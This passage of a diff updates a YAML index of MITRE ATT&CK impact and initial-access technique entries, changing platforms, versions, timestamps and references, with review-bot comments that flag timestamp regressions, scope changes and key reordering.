Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58452,9 +59431,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
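Review bot: adding `IaaS` to T1531's platforms (alongside the `Office 365` to `Office Suite` rename) widens Account Access Removal to cloud IAM, but the visible head of `x_mitre_data_sources` is still `Active Directory: Active Directory Object Modification` and `User Account: User Account Modification`, and the detection text for this object only discusses process monitoring of `Net` and Windows event logs; the rest of the data source list is outside the hunk, so confirm a cloud-side source is present before merging.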
@@ -58480,9 +59460,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -58569,7 +59548,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
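Review bot: same backwards `modified` issue as on T1491.001: T1486 goes from `2022-11-08T14:00:00.188Z` to `2022-06-16T13:07:10.318Z` with no other change to the object. Verify against the upstream STIX object before merging, because a regressed timestamp hides this entry from anyone syncing on a modified-since basis.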
@@ -58593,12 +59572,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58617,7 +59595,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -58634,18 +59611,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
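Review bot: the T1499 platform list loses `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` and keeps only `Windows`, `Linux`, `macOS`, `Containers`, `IaaS`, so Endpoint DoS against SaaS-hosted services is no longer claimed by this entry; that is a scope narrowing, not just the Office Suite rename applied elsewhere, and deserves a sentence in the commit message. The removal of `x_mitre_modified_by_ref` in this hunk is a key reorder (it reappears at the end of the object in a later hunk, together with the attack_spec_version bump to 3.2.0), not a drop.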
@@ -58669,8 +59641,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58690,33 +59662,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
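Review bot: the rewritten T1496 description replaces the cryptomining and proxyjacking paragraphs (which now live in the T1496.001 and T1496.002 sub-technique objects added above) with a four-bullet summary, and its citation set collapses to the single `Sysdig Cryptojacking Proxyjacking 2023` reference; that is consistent with the `x_mitre_version` bump to 2.0 in the following hunk. The markdown bullets are carried as literal `\n` escapes inside a double-quoted YAML scalar, which parses correctly, but any tooling that renders the index should be checked against the embedded `* ` list rather than assuming single-paragraph descriptions.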
@@ -58727,7 +59688,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -58744,8 +59705,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -58764,99 +59728,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
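Review bot: the T1565.002 block is a pure key reorder plus `x_mitre_attack_spec_version: 2.1.0` to `3.2.0`, `spec_version` dropped, `modified` advanced to `2024-08-26T16:33:33.983Z`, and the FireEye APT38 reference re-pointed from `https://content.fireeye.com/apt/rpt-apt38` to the Mandiant PDF; the description and detection text are unchanged context, so the `modified` bump presumably reflects the URL fix upstream. Two upstream typos sit in the untouched context and belong in an upstream ticket rather than a local edit: `an opportunity deploy a tool` (missing `to`) and `as at passes over a network` (`it`). In the T1496 reference list above, `Targeting GitLab . Retrieved` carries a stray space before the period.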
@@ -58865,7 +59803,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58891,9 +59829,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
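Review bot: the T1485 description is updated to name `cloud storage objects, machine images, database instances` as deletion targets, and the only data source added is `Cloud Storage: Cloud Storage Modification`; the existing list already covers `Snapshot: Snapshot Deletion` and `Image: Image Deletion`, but nothing visible here covers database instance deletion, so confirm the list matches upstream for version 1.3 rather than being a partial pick.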
@@ -58949,55 +59888,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -59012,6 +59907,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -59024,16 +59923,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
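Review bot: most of the added lines in this T1498 hunk are relocations rather than changes: `type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` are now emitted below `x_mitre_detection`, and `x_mitre_is_subtechnique: false`, `x_mitre_modified_by_ref` and `x_mitre_attack_spec_version` are each removed at one position and re-added at another. The substantive diff is `x_mitre_version: '1.1'` to `'1.2'`, `x_mitre_attack_spec_version: 2.1.0` to `3.2.0`, the new `revoked: false`, and the dropped `spec_version: '2.1'`. If the generator pins a key order (sorted keys, or the upstream STIX order), index diffs would show only content changes, which matters when a reviewer has to spot a silently changed `id` or `external_id` inside a hunk this size.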
@@ -59101,11 +60036,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
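Review bot: `spec_version: '2.1'` is removed from T1495 here with no replacement, and the same removal recurs for every technique object in this diff. That is harmless for the atomic index itself, but any consumer that lifts a `technique` mapping back out as a STIX 2.1 SDO loses a required property; if the drop is deliberate (the upstream bundle carrying `spec_version` only at bundle level), a sentence in the commit message saying so would save the next reviewer the check. The `modified` bump for T1490 to 2024-09-24 is consistent with the description edit that follows.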
@@ -59123,7 +60057,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -59150,7 +60084,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -59200,13 +60134,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -59274,11 +60207,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
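Review bot: the `modified` timestamp for T1529 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-22T20:45:22.531Z`, with no other change to the object. The same regression appears later in this diff for T1133, T1195.003, T1195.002 and T1200, each from a `...T14:00:00.188Z` value to an earlier, finer-grained one, which looks like the upstream source moving from release-wide bulk timestamps to per-object ones rather than a stale bundle. It is still worth confirming against the ATT&CK release the generator pulled, because anything that compares `modified` to decide whether a cached copy of a technique is current will now treat these entries as older than what it already holds and may skip them.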
@@ -59343,13 +60275,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59427,7 +60358,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -59477,11 +60407,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
